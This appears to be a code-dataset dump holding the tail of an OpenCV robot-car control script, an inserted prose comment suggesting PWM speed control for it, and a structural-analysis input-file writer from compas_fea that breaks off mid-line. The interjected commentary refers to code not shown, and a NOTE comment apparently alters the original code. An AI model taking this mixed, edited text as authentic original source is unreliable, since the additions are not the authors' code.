change\r\ncv2.createTrackbar('lowH','HSV_TRACKBAR',ilowH,179,callback)\r\ncv2.createTrackbar('highH','HSV_TRACKBAR',ihighH,179,callback)\r\n\r\ncv2.createTrackbar('lowS','HSV_TRACKBAR',ilowS,255,callback)\r\ncv2.createTrackbar('highS','HSV_TRACKBAR',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('lowV','HSV_TRACKBAR',ilowV,255,callback)\r\ncv2.createTrackbar('highV','HSV_TRACKBAR',ihighV,255,callback)\r\n\r\nwhile True:\r\n \r\n ut=ultra()\r\n print(\"distance\",ut)\r\n _, frame = cap.read()\r\n \r\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n \r\n hL = 
cv2.getTrackbarPos('lowH','HSV_TRACKBAR')\r\n hH = cv2.getTrackbarPos('highH','HSV_TRACKBAR')\r\n sL = cv2.getTrackbarPos('lowS','HSV_TRACKBAR')\r\n sH = cv2.getTrackbarPos('highS','HSV_TRACKBAR')\r\n vL = cv2.getTrackbarPos('lowV','HSV_TRACKBAR')\r\n vH = cv2.getTrackbarPos('highV','HSV_TRACKBAR')\r\n \r\n #red color\r\n #low_red = np.array([0, 140, 136])\r\n #high_red = np.array([9,255,255])\r\n \r\n #green Color\r\n #low_green = np.array([51, 31, 117])\r\n #high_green = np.array([81,255,255])\r\n \r\n lower_hsv = np.array([hL,sL,vL],np.uint8)\r\n higher_hsv = np.array([hH,sH,vH],np.uint8)\r\n \r\n mask = cv2.inRange(hsv_frame, lower_hsv, higher_hsv)\r\n \r\n kernel= np.ones((5,5),np.uint8)\r\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\r\n mask=opening\r\n \r\n #For openCV version 2 or 4 \r\n if cv2.getVersionMajor() in [2, 4]:\r\n contours,_ = cv2.findContours(mask,cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours= sorted(contours, key=lambda x:cv2.contourArea(x) , reverse=True)\r\n else:\r\n #For OpenCV 3 \r\n _,contours,_ = cv2.findContours(mask,cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours= sorted(contours, key=lambda x:cv2.contourArea(x) , reverse=True)\r\n \r\n for cnt in contours: \r\n (x,y,w,h) = cv2.boundingRect(cnt)\r\n area = cv2.contourArea(cnt)\r\n print(area)\r\n if area>450: #20000 to stop\r\n x_middle = int((x+x+w)/2)\r\n y_middle = int((y+y+h)/2) \r\n cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 2)\r\n break\r\n else:\r\n x_middle = x_center\r\n y_middle = y_center\r\n stop_car()\r\n \r\n cv2.line( frame, (x_middle,0), (x_middle,rows), (0,0,255),1)\r\n cv2.line( frame, (0,y_middle), (cols,y_middle), (0,0,255),1)\r\n \r\n if (ut > 20 and ut <300) and area<38000 and area>450:\r\n if x_middle < x_center-45:\r\n frame=cv2.putText( frame, \"Move Left\",org,font,fontScale,color,thickness,cv2.LINE_AA)\r\n time.sleep(0.09)\r\n shift_left(100)\r\n time.sleep(0.02)\r\n stop_car()\r\n elif x_middle>x_center+45 :\r\n frame=cv2.putText( frame, \"Move Right\",org,font,fontScale,color,thickness, cv2.LINE_AA)\r\n time.sleep(0.09)\r\n shift_right(100)\r\n time.sleep(0.02)\r\n stop_car()\r\n elif x_middle>=x_center-45 or x_middle<=x_center+45 :\r\n frame=cv2.putText( frame, \"Move Forward\",org,font,fontScale,color,thickness, cv2.LINE_AA)\r\n time.sleep(0.09)\r\n go_ahead(100)\r\n time.sleep(0.08)\r\n stop_car()\r\n elif ut<=20 or area>=38000:\r\n frame=cv2.putText( frame, \"STOP!!!\",org,font,fontScale,(0,0,255),thickness, cv2.LINE_AA) \r\n stop_car()\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n cv2.imshow(\"mask\", mask)\r\n \r\n \r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nGPIO.cleanup()\r\n","sub_path":"Integrated_final_Code.py","file_name":"Integrated_final_Code.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
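In the robot-car record above (seq_id 108480526), every movement helper accepts a `speed` argument but never uses it: the ENA/ENB enable pins are driven as constant digital highs, so the motors always run at full speed. The script's own comments mention ChangeDutyCycle, which suggests software PWM was intended. A hedged sketch of what that could look like, reusing the script's BOARD-mode pin numbers (ENAL=11, ENBL=22, ENAR=19, ENBR=32); this is an assumption about intent, not the original behavior:

import RPi.GPIO as GPIO

GPIO.setmode(GPIO.BOARD)
_pwms = []
for pin in (11, 22, 19, 32):  # ENAL, ENBL, ENAR, ENBR from the script
    GPIO.setup(pin, GPIO.OUT)
    p = GPIO.PWM(pin, 1000)   # 1 kHz software PWM carrier is a common choice
    p.start(0)                # start at 0% duty cycle (motors stopped)
    _pwms.append(p)

def set_speed(speed):
    # speed is a duty cycle in 0..100, matching calls such as go_ahead(100)
    for p in _pwms:
        p.ChangeDutyCycle(speed)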
+{"seq_id":"188480972","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport json\n\n\n__author__ = ['Andrew Liew ']\n__copyright__ = 'Copyright 2018, BLOCK Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'liew@arch.ethz.ch'\n\n\n__all__ = [\n 'write_input_steps',\n]\n\n\ncomments = {\n 'abaqus': '**',\n 'opensees': '#',\n 'sofistik': '$',\n 'ansys': '!',\n}\n\nmiddle = {\n 'abaqus': '',\n 'opensees': '}\\n',\n 'sofistik': '',\n 'ansys': '',\n}\n\nheaders = {\n 'abaqus': '',\n 'opensees': '',\n 'sofistik': '+PROG ASE\\n$\\n',\n 'ansys': '',\n}\n\nfooters = {\n 'abaqus': '',\n 'opensees': '',\n 'sofistik': 'END\\n$\\n$\\n',\n 'ansys': '',\n}\n\ndofs = ['x', 'y', 'z', 'xx', 'yy', 'zz']\nnode_fields = ['rf', 'rm', 'u', 'ur', 'cf', 'cm']\nelement_fields = ['sf', 'sm', 'sk', 'se', 's', 'e', 'pe', 'rbfor', 'ctf']\n\n\ndef _write_point_loads(f, software, com, factor):\n\n if software == 'abaqus':\n\n f.write('*CLOAD\\n')\n f.write('**\\n')\n\n for node, coms in com.items():\n ni = node + 1\n for ci, value in coms.items():\n index = dofs.index(ci) + 1\n f.write('{0}, {1}, {2}'.format(ni, index, value * factor) + '\\n')\n\n elif software == 'sofistik':\n\n for node, coms in com.items():\n ni = node + 1\n for ci, value in coms.items():\n if ci in 'xyz':\n f.write(' NODE NO {0} TYPE P{1}{1} {2}[kN]\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n f.write(' NODE NO {0} TYPE M{1} {2}[kNm]\\n'.format(ni, ci.upper(), value * 0.001))\n\n elif software == 'opensees':\n\n pass\n elif software == 'ansys':\n\n pass\n\n\ndef _write_point_load(f, software, com, nodes, ndof, sets, factor):\n\n if software == 'abaqus':\n\n f.write('*CLOAD\\n')\n f.write('**\\n')\n for node in nodes:\n if isinstance(node, str):\n ni = node\n else:\n ni = node + 1\n for ci, dof in enumerate(dofs, 1):\n if com[dof]:\n f.write('{0}, {1}, {2}'.format(ni, ci, com[dof] * factor) + '\\n')\n f.write('**\\n')\n\n elif software == 'sofistik':\n\n for node in nodes:\n if isinstance(node, str):\n selection = sets[node]['selection']\n for i in selection:\n ni = i + 1\n for ci, value in com.items():\n if value:\n if ci in 'xyz':\n f.write(' NODE NO {0} TYPE P{1}{1} {2}\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n f.write(' NODE NO {0} TYPE M{1} {2}\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n pass\n\n elif software == 'opensees':\n\n coms = ' '.join([str(com[dof]) for dof in dofs[:ndof]])\n for node in nodes:\n if isinstance(node, str):\n selection = sets[node]['selection']\n for i in selection:\n ni = i + 1\n f.write('load {0} {1}\\n'.format(ni, coms))\n else:\n ni = node + 1\n f.write('load {0} {1}\\n'.format(ni, coms))\n f.write('#\\n')\n\n elif software == 'opensees':\n\n pass\n\n\ndef _write_line_load(f, software, axes, com, factor, elset, sets, structure):\n\n for k in elset:\n\n if software == 'abaqus':\n\n f.write('*DLOAD\\n')\n f.write('**\\n')\n\n if axes == 'global':\n for dof in dofs[:3]:\n if com[dof]:\n f.write('{0}, P{1}, {2}'.format(k, dof.upper(), factor * com[dof]) + '\\n')\n\n elif axes == 'local':\n if com['x']:\n f.write('{0}, P1, {1}'.format(k, factor * com['x']) + '\\n')\n if com['y']:\n f.write('{0}, P2, {1}'.format(k, factor * com['y']) + '\\n')\n\n elif software == 'opensees':\n\n if axes == 'global':\n raise NotImplementedError\n\n elif axes == 'local':\n elements = ' '.join([str(i + 1) for i in sets[k]['selection']])\n f.write('eleLoad -ele {0} -type -beamUniform {1} 
{2}\\n'.format(elements, -com['y'], -com['x']))\n\n elif software == 'sofistik':\n\n for i in sets[k]['selection']:\n ni = structure.sofistik_mapping[i]\n if axes == 'global':\n if com['x']:\n f.write(' BEAM {0} TYPE PXX {1}[kN/m]\\n'.format(ni, com['x'] * 0.001))\n if com['y']:\n f.write(' BEAM {0} TYPE PYY {1}[kN/m]\\n'.format(ni, com['y'] * 0.001))\n if com['z']:\n f.write(' BEAM {0} TYPE PZZ {1}[kN/m]\\n'.format(ni, com['z'] * 0.001))\n elif axes == 'local':\n if com['z']:\n f.write(' BEAM {0} TYPE PX {1}[kN/m]\\n'.format(ni, com['z'] * 0.001))\n if com['x']:\n f.write(' BEAM {0} TYPE PY {1}[kN/m]\\n'.format(ni, com['x'] * 0.001))\n if com['y']:\n f.write(' BEAM {0} TYPE PZ {1}[kN/m]\\n'.format(ni, com['y'] * 0.001))\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_area_load(f, software, com, axes, elset, sets, factor):\n\n if software == 'opensees':\n\n pass\n\n elif software == 'abaqus':\n\n if axes == 'global':\n raise NotImplementedError\n\n elif axes == 'local':\n # x COMPONENT\n # y COMPONENT\n f.write('*DLOAD\\n')\n f.write('**\\n')\n if com['z']:\n f.write('{0}, P, {1}'.format(elset, factor * com['z']) + '\\n')\n\n elif software == 'sofistik':\n\n components = ''\n for i in 'xyz':\n if com[i]:\n if axes == 'local':\n components += ' P{0} {1}[kN/m2]'.format(i.upper(), 0.001 * com[i])\n elif axes == 'global':\n components += ' P{0}{0} {1}[kN/m2]'.format(i.upper(), 0.001 * com[i])\n for k in elset:\n set_index = sets[k]['index'] + 1\n f.write(' QUAD GRP {0} TYPE{1}\\n'.format(set_index, components))\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_gravity_load(f, software, g, com, elset, factor):\n\n gx = com['x'] if com['x'] else 0\n gy = com['y'] if com['y'] else 0\n gz = com['z'] if com['z'] else 0\n\n if software == 'abaqus':\n\n for k in elset:\n f.write('*DLOAD\\n')\n f.write('**\\n')\n f.write('{0}, GRAV, {1}, {2}, {3}, {4}\\n'.format(k, g * factor, gx, gy, gz))\n f.write('**\\n')\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_displacements(f, software, com, nset, factor, sets, ndof):\n\n if software == 'abaqus':\n\n f.write('*BOUNDARY\\n')\n f.write('**\\n')\n for ci, dof in enumerate(dofs, 1):\n if com[dof] is not None:\n f.write('{0}, {1}, {1}, {2}\\n'.format(nset, ci, com[dof] * factor))\n\n elif software == 'opensees':\n\n for ci, dof in enumerate(dofs[:ndof], 1):\n if com[dof] is not None:\n for node in sets[nset]['selection']:\n f.write('sp {0} {1} {2}\\n'.format(node + 1, ci, com[dof]))\n\n elif software == 'sofistik':\n\n for i in sets[nset]['selection']:\n ni = i + 1\n if com['x'] is not None:\n f.write(' NODE {0} TYPE WXX {1}[mm]\\n'.format(ni, com['x'] * 1000))\n if com['y'] is not None:\n f.write(' NODE {0} TYPE WYY {1}[mm]\\n'.format(ni, com['y'] * 1000))\n if com['z'] is not None:\n f.write(' NODE {0} TYPE WZZ {1}[mm]\\n'.format(ni, com['z'] * 1000))\n if com['xx'] is not None:\n f.write(' NODE {0} TYPE DXX {1}\\n'.format(ni, com['xx'] * 1000))\n if com['yy'] is not None:\n f.write(' NODE {0} TYPE DYY {1}\\n'.format(ni, com['yy'] * 1000))\n if com['zz'] is not None:\n f.write(' NODE {0} TYPE DZZ {1}\\n'.format(ni, com['zz'] * 1000))\n\n\ndef _write_tributary_load(f, software, com, factor):\n\n if software == 'abaqus':\n f.write('*CLOAD\\n')\n f.write('**\\n')\n\n for node in sorted(com, key=int):\n ni = node + 1\n\n if software == 'abaqus':\n\n for ci, dof in enumerate(dofs[:3], 1):\n if com[node][dof]:\n ni = node + 1\n dl = com[node][dof] * factor\n 
f.write('{0}, {1}, {2}\\n'.format(ni, ci, dl))\n\n elif software == 'sofistik':\n\n f.write(' NODE NO {0} TYPE '.format(ni))\n for ci, dof in enumerate(dofs[:3], 1):\n if com[node][dof]:\n dl = com[node][dof] / 1000.\n f.write('P{0}{0}[kN] {1}\\n'.format(dof.upper(), dl))\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_prestress_load(f, software, elset, com):\n\n for k in elset:\n\n if software == 'abaqus':\n\n f.write('*INITIAL CONDITIONS, TYPE=STRESS\\n')\n f.write('{0}, '.format(k))\n if com['sxx']:\n f.write('{0}\\n'.format(com['sxx']))\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_thermal_load(f, software, elset, temperature, sets, factor):\n\n for k in elset:\n\n if software == 'abaqus':\n\n pass\n\n elif software == 'sofistik':\n\n for k in elset:\n set_index = sets[k]['index'] + 1\n f.write(' QUAD GRP {0} TYPE {1} {2}\\n'.format(set_index, 'DTXY', temperature))\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef write_input_steps(f, software, structure, steps, loads, displacements, sets, fields, ndof=6, properties={}):\n\n \"\"\" Writes the Steps information to the input file.\n\n Parameters\n ----------\n f : obj\n The open file object for the .tcl file.\n software : str\n Analysis software or library to use, 'abaqus', 'opensees', 'sofistik' or 'ansys'.\n structure : obj\n The Structure object to read from.\n steps : dic\n Step objects from structure.steps.\n loads : dic\n Load objects from structure.loads.\n displacements : dic\n Displacement objects from structure.displacements.\n sets : dic\n Sets from structures.sets.\n fields : list\n Requested fields output.\n ndof : int\n Number of degrees-of-freedom per node.\n properties : dic\n ElementProperties objects from structure.element_properties\n\n Returns\n -------\n None\n\n \"\"\"\n\n c = comments[software]\n\n if software == 'sofistik':\n\n f.write('{0} -----------------------------------------------------------------------------\\n'.format(c))\n f.write('{0} ----------------------------------------------------------------------- Loads\\n'.format(c))\n f.write('$\\n')\n f.write('+PROG SOFILOAD\\n')\n\n for k in sorted(loads):\n\n load = loads[k]\n load_index = load.index + 1\n ltype = load.__name__\n com = getattr(load, 'components', None)\n axes = getattr(load, 'axes', None)\n temperature = getattr(load, 'temperature', None)\n nodes = getattr(load, 'nodes', None)\n elset = getattr(load, 'elements', None)\n\n if isinstance(nodes, str):\n nodes = [nodes]\n\n if isinstance(elset, str):\n elset = [elset]\n\n if ltype != 'GravityLoad':\n\n f.write('$\\n')\n f.write('$ {0}\\n'.format(k))\n f.write('$ ' + '-' * len(k) + '\\n')\n f.write('$\\n')\n f.write(\"LC {0} TITL '{1}'\\n\".format(load_index, k))\n\n if ltype == 'PointLoad':\n _write_point_load(f, software, com, nodes, ndof, sets, 1)\n\n elif ltype == 'PointLoads':\n _write_point_loads(f, software, com, 1)\n\n elif ltype == 'LineLoad':\n _write_line_load(f, software, axes, com, 1, elset, sets, structure)\n\n elif ltype == 'PrestressLoad':\n _write_prestress_load(f, software, elset, com)\n\n elif ltype == 'TributaryLoad':\n _write_tributary_load(f, software, com, 1)\n\n elif ltype == 'AreaLoad':\n _write_area_load(f, software, com, axes, elset, sets, 1)\n\n elif ltype == 'ThermalLoad':\n _write_thermal_load(f, software, elset, temperature, sets, 1)\n\n f.write('$\\n')\n\n for k in 
sorted(displacements):\n\n bc_disps = steps[structure.steps_order[0]].displacements\n if isinstance(bc_disps, str):\n bc_disps = [bc_disps]\n\n if k not in bc_disps:\n\n displacement = displacements[k]\n displacement_index = displacement.index + 1 + len(structure.loads)\n com = displacement.components\n nset = displacement.nodes\n\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('$\\n')\n f.write(\"LC {0} TITL '{1}'\\n\".format(displacement_index, k))\n\n _write_displacements(f, software, com, nset, 1, sets, ndof)\n\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n f.write('{0} -----------------------------------------------------------------------------\\n'.format(c))\n f.write('{0} ----------------------------------------------------------------------- Steps\\n'.format(c))\n f.write('{0}\\n'.format(c))\n\n keys = list(structure.steps_order[1:])\n\n temp = '{0}{1}/'.format(structure.path, structure.name)\n try:\n os.stat(temp)\n except:\n os.mkdir(temp)\n\n for key in keys:\n\n step = steps[key]\n stype = step.__name__\n step_index = step.index\n state = getattr(step, 'state', None)\n factor = getattr(step, 'factor', 1)\n increments = getattr(step, 'increments', None)\n tolerance = getattr(step, 'tolerance', None)\n iterations = getattr(step, 'iterations', None)\n method = getattr(step, 'type', None)\n nlgeom = 'YES' if getattr(step, 'nlgeom', None) else 'NO'\n nlmat = 'YES' if getattr(step, 'nlmat', None) else 'NO'\n\n if isinstance(step.loads, str):\n step.loads = [step.loads]\n\n # Mechanical\n\n if stype in ['GeneralStep', 'BucklingStep']:\n\n if headers[software]:\n f.write(headers[software])\n\n f.write('{0} {1}\\n'.format(c, key))\n f.write('{0} '.format(c) + '-' * len(key) + '\\n')\n f.write('{0}\\n'.format(c))\n\n if software == 'abaqus':\n\n perturbation = ', PERTURBATION' if stype == 'BucklingStep' else ''\n f.write('*STEP, NLGEOM={0}, NAME={1}{2}, INC={3}\\n'.format(nlgeom, key, perturbation, increments))\n f.write('*{0}\\n'.format(method.upper()))\n # f.write(', {0}\\n'.format(factor))\n f.write('**\\n')\n\n if stype == 'BucklingStep':\n modes = step.modes\n f.write('{0}, {1}, {2}, {3}\\n'.format(modes, modes, 2 * modes, increments))\n\n f.write('**\\n')\n\n elif software == 'opensees':\n\n f.write('timeSeries Constant {0} -factor 1.0\\n'.format(step_index))\n f.write('pattern Plain {0} {0} -fact {1} {2}\\n'.format(step_index, factor, '{'))\n f.write('#\\n')\n\n elif software == 'sofistik':\n\n f.write(\"LC 1{0:0>2}0 TITL '{1}' DLZ 0.0\\n\".format(step_index, key))\n\n # Loads\n\n for k in step.loads:\n\n load = loads[k]\n load_index = load.index + 1\n ltype = load.__name__\n com = getattr(load, 'components', None)\n axes = getattr(load, 'axes', None)\n nodes = getattr(load, 'nodes', None)\n\n if isinstance(factor, dict):\n fact = factor.get(k, 1.0)\n else:\n fact = factor\n\n if isinstance(nodes, str):\n nodes = [nodes]\n\n if isinstance(load.elements, str):\n elset = [load.elements]\n else:\n elset = load.elements\n\n if software != 'sofistik':\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('{0}\\n'.format(c))\n else:\n if ltype != 'GravityLoad':\n f.write(' LCC {0} FACT {1} $ {2}\\n'.format(load_index, fact, k))\n\n # Point load\n\n if ltype == 'PointLoad':\n if software != 'sofistik':\n _write_point_load(f, software, com, nodes, ndof, sets, fact)\n\n # Point loads\n\n elif ltype == 'PointLoads':\n if software != 'sofistik':\n 
_write_point_loads(f, software, com, fact)\n\n # # Pre-stress\n\n elif ltype in ['PrestressLoad']:\n if software != 'sofistik':\n _write_prestress_load(f, software, elset, com)\n\n # Line load\n\n elif ltype == 'LineLoad':\n if software != 'sofistik':\n _write_line_load(f, software, axes, com, fact, elset, sets, structure)\n\n # Area load\n\n elif ltype == 'AreaLoad':\n if software != 'sofistik':\n _write_area_load(f, software, com, axes, elset, sets, fact)\n\n # Body load\n\n elif ltype == 'BodyLoad':\n\n raise NotImplementedError\n\n # Gravity load\n\n elif ltype == 'GravityLoad':\n if software != 'sofistik':\n _write_gravity_load(f, software, load.g, com, elset, fact)\n\n # Tributary load\n\n elif ltype == 'TributaryLoad':\n if software != 'sofistik':\n _write_tributary_load(f, software, com, fact)\n\n # Displacements\n\n for k in step.displacements:\n\n if isinstance(factor, dict):\n fact = factor.get(k, 1.0)\n else:\n fact = factor\n\n displacement = displacements[k]\n displacement_index = displacement.index + 1 + len(structure.loads)\n com = displacement.components\n nset = displacement.nodes\n\n if software != 'sofistik':\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('{0}\\n'.format(c))\n _write_displacements(f, software, com, nset, fact, sets, ndof)\n\n else:\n f.write(' LCC {0} $ {1}\\n'.format(displacement_index, k))\n\n # Output\n\n if middle[software]:\n f.write(middle[software])\n\n if software == 'opensees':\n\n nodal = {}\n node_range = '1 {0}'.format(structure.node_count())\n\n if 'u' in fields:\n nodal['node_u.out'] = '1 2 3 disp'\n if 'rf' in fields:\n nodal['node_rf.out'] = '1 2 3 reaction'\n if ndof == 6:\n if 'ur' in fields:\n nodal['node_ur.out'] = '4 5 6 disp'\n if 'rm' in fields:\n nodal['node_rm.out'] = '4 5 6 reaction'\n\n prefix = 'recorder Node -file {0}{1}_'.format(temp, key)\n for k, j in nodal.items():\n f.write('{0}{1} -time -nodeRange {2} -dof {3}\\n'.format(prefix, k, node_range, j))\n\n truss_elements = ''\n beam_elements = ''\n spring_elements = ''\n truss_numbers = []\n beam_numbers = []\n spring_numbers = []\n\n for ekey, element in structure.elements.items():\n etype = element.__name__\n\n if etype in ['TrussElement', 'StrutElement', 'TieElement']:\n truss_elements += '{0} '.format(ekey + 1)\n truss_numbers.append(ekey)\n\n elif etype in ['BeamElement']:\n beam_elements += '{0} '.format(ekey + 1)\n beam_numbers.append(ekey)\n\n elif etype in ['SpringElement']:\n spring_elements += '{0} '.format(ekey + 1)\n spring_numbers.append(ekey)\n\n prefix = 'recorder Element -file {0}{1}_'.format(temp, key)\n\n if 'sf' in fields:\n\n if truss_elements:\n k = 'element_truss_sf.out'\n j = 'axialForce'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, truss_elements, j))\n\n if beam_elements:\n k = 'element_beam_sf.out'\n j = 'force'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, beam_elements, j))\n\n if 'spf' in fields:\n\n if spring_elements:\n k = 'element_spring_sf.out'\n j = 'basicForces'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, spring_elements, j))\n\n with open('{0}truss_numbers.json'.format(temp), 'w') as fo:\n json.dump({'truss_numbers': truss_numbers}, fo)\n\n with open('{0}beam_numbers.json'.format(temp), 'w') as fo:\n json.dump({'beam_numbers': beam_numbers}, fo)\n\n with open('{0}spring_numbers.json'.format(temp), 'w') as fo:\n json.dump({'spring_numbers': spring_numbers}, fo)\n\n f.write('#\\n')\n # f.write('constraints Plain\\n')\n f.write('constraints 
Transformation\\n')\n f.write('numberer RCM\\n')\n f.write('system ProfileSPD\\n')\n f.write('test NormUnbalance {0} {1} 5\\n'.format(tolerance, iterations))\n f.write('algorithm NewtonLineSearch\\n')\n f.write('integrator LoadControl {0}\\n'.format(1./increments))\n f.write('analysis Static\\n')\n f.write('analyze {0}\\n'.format(increments))\n\n elif software == 'abaqus':\n\n if isinstance(fields, list):\n fields = structure.fields_dic_from_list(fields)\n if 'spf' in fields:\n fields['ctf'] = 'all'\n del fields['spf']\n\n f.write('**\\n')\n f.write('*OUTPUT, FIELD\\n')\n f.write('**\\n')\n f.write('*NODE OUTPUT\\n')\n f.write('**\\n')\n f.write(', '.join([i.upper() for i in node_fields if i in fields]) + '\\n')\n f.write('**\\n')\n f.write('*ELEMENT OUTPUT\\n')\n f.write('**\\n')\n f.write(', '.join([i.upper() for i in element_fields if (i in fields and i != 'rbfor')]) + '\\n')\n if 'rbfor' in fields:\n f.write('*ELEMENT OUTPUT, REBAR\\n')\n f.write('RBFOR\\n')\n f.write('**\\n')\n f.write('*END STEP\\n')\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n f.write('{0}\\n'.format(c))\n f.write('{0}\\n'.format(c))\n\n if footers[software]:\n f.write(footers[software])\n\n if software == 'sofistik':\n\n is_rebar = False\n for property in properties.values():\n if property.reinforcement:\n is_rebar = True\n\n if is_rebar:\n\n f.write('+PROG BEMESS\\n')\n f.write(\"HEAD REBAR {0} LC 1{1:0>2}0\\n\".format(state.upper(), step_index))\n f.write('$\\n')\n f.write('CTRL WARN 471 $ Element thickness too thin and not allowed for a design.\\n')\n # f.write('CTRL WARN 496 $ Possible non-constant longitudinal reinforcement.\\n')\n # f.write('CTRL WARN 254 $ Vertical shear reinforcement not allowed for slab thickness smaller 20 cm.\\n')\n f.write('CTRL PFAI 2\\n')\n if state == 'sls':\n # f.write('CTRL SERV GALF 1.45\\n')\n f.write('CTRL SLS\\n')\n f.write('CRAC WK PARA\\n')\n else:\n f.write('CTRL ULTI\\n')\n f.write('CTRL LCR {0}\\n'.format(step_index))\n f.write('LC 1{0:0>2}0\\n'.format(step_index)) # can put many LC here LC301,302 etc\n f.write('$\\n')\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n # if state == 'uls':\n\n # f.write('+PROG BEMESS\\n')\n # f.write(\"HEAD REBAR {0} LC 1{1:0>2}0 COMBINED\\n\".format(state.upper(), step_index))\n # f.write('$\\n')\n # f.write('CTRL WARN 471 $ Element thickness too thin and not allowed for a design.\\n')\n # f.write('CTRL PFAI 2\\n')\n # f.write('CTRL LCRI {0}\\n'.format(step_index))\n # f.write('CTRL LCR 1{0:0>2}\\n'.format(step_index))\n # f.write('$\\n')\n # f.write('$\\n')\n # f.write('END\\n')\n # f.write('$\\n')\n # f.write('$\\n')\n\n f.write('+PROG ASE\\n')\n f.write(\"HEAD SOLVE {0} LC 2{1:0>2}0 {2}\\n\".format(state.upper(), step_index, key))\n f.write('$\\n')\n f.write('CTRL SOLV 1\\n')\n f.write('CTRL CONC\\n')\n\n if state == 'sls':\n f.write('NSTR KMOD S1 KSV SLD\\n')\n elif state == 'uls':\n f.write('NSTR KMOD S1 KSV ULD\\n')\n if nlgeom == 'YES':\n f.write('SYST PROB TH3 ITER {0} TOL {1} NMAT {2}\\n'.format(increments, tolerance, nlmat))\n\n # if state == 'uls':\n # f.write('REIQ LCR 1{0:0>2}\\n'.format(step_index))\n # else:\n # f.write('REIQ LCR {0}\\n'.format(step_index))\n\n f.write('REIQ LCR {0}\\n'.format(step_index))\n f.write('$\\n')\n\n DLX, DLY, DLZ = 0, 0, 0\n for load in loads.values():\n if load.__name__ == 'GravityLoad':\n com = load.components\n DLX = com['x'] if com['x'] else 0\n DLY = com['y'] if com['y'] else 0\n DLZ = com['z'] if com['z'] else 0\n break\n\n 
if isinstance(factor, dict):\n # NOTE: per-load factors were already applied load by load above; assume\n # unit scaling of gravity for the combined load case (the original left\n # fact possibly unbound here and mixed fact/factor in the DLY term)\n fact = 1.0\n else:\n fact = factor\n\n f.write('$\\n')\n f.write(\"LC 2{0:0>2}0 TITL '{1}'\".format(step_index, key))\n f.write(' DLX {0} DLY {1} DLZ {2}\\n'.format(DLX * fact, DLY * fact, DLZ * fact))\n f.write(' LCC 1{0:0>2}0\\n'.format(step_index))\n\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n # f.write('+PROG ASE\\n')\n # f.write(\"HEAD CREEP {0} LC 3{1:0>2}0 {2}\\n\".format(state.upper(), step_index, key))\n # f.write('$\\n')\n # f.write('CTRL SOLV 1\\n')\n # f.write('CTRL CONC\\n')\n # f.write('CREP NCRE 10\\n')\n\n # if nlgeom == 'YES':\n # f.write('SYST PROB TH3 ITER {0} TOL {1} NMAT {2} PLC 2{3:0>2}0\\n'.format(increments, tolerance, nlmat, step_index))\n # f.write('GRP ALL FACS 1.00 PHI 1.00 PHIF 0 EPS -0.0005\\n')\n\n # f.write('REIQ LCR {0}\\n'.format(step_index))\n # f.write('$\\n')\n\n # DLX, DLY, DLZ = 0, 0, 0\n # for load in loads.values():\n # if load.__name__ == 'GravityLoad':\n # com = load.components\n # DLX = com['x'] if com['x'] else 0\n # DLY = com['y'] if com['y'] else 0\n # DLZ = com['z'] if com['z'] else 0\n # break\n\n # f.write('$\\n')\n # f.write(\"LC 3{0:0>2}0 TITL '{1} CREEP'\".format(step_index, key))\n # f.write(' DLX {0} DLY {1} DLZ {2} FACT {3}\\n'.format(DLX * factor, DLY * factor, DLZ * factor, factor))\n # f.write(' LCC 2{0:0>2}0 PLC YES\\n'.format(step_index))\n\n # f.write('$\\n')\n # f.write('END\\n')\n # f.write('$\\n')\n # f.write('$\\n')\n\n\n# Thermal\n\n# try:\n# duration = step.duration\n# except:\n# duration = 1\n# temperatures = steps[key].temperatures\n# if temperatures:\n# file = misc[temperatures].file\n# einc = str(misc[temperatures].einc)\n# f.write('**\\n')\n# f.write('*TEMPERATURE, FILE={0}, BSTEP=1, BINC=1, ESTEP=1, EINC={1}, INTERPOLATE\\n'.format(file, einc))\n\n# elif stype == 'HeatStep':\n\n# temp0 = step.temp0\n# duration = step.duration\n# deltmx = steps[key].deltmx\n# interaction = interactions[step.interaction]\n# amplitude = interaction.amplitude\n# interface = interaction.interface\n# sink_t = interaction.sink_t\n# film_c = interaction.film_c\n# ambient_t = interaction.ambient_t\n# emissivity = 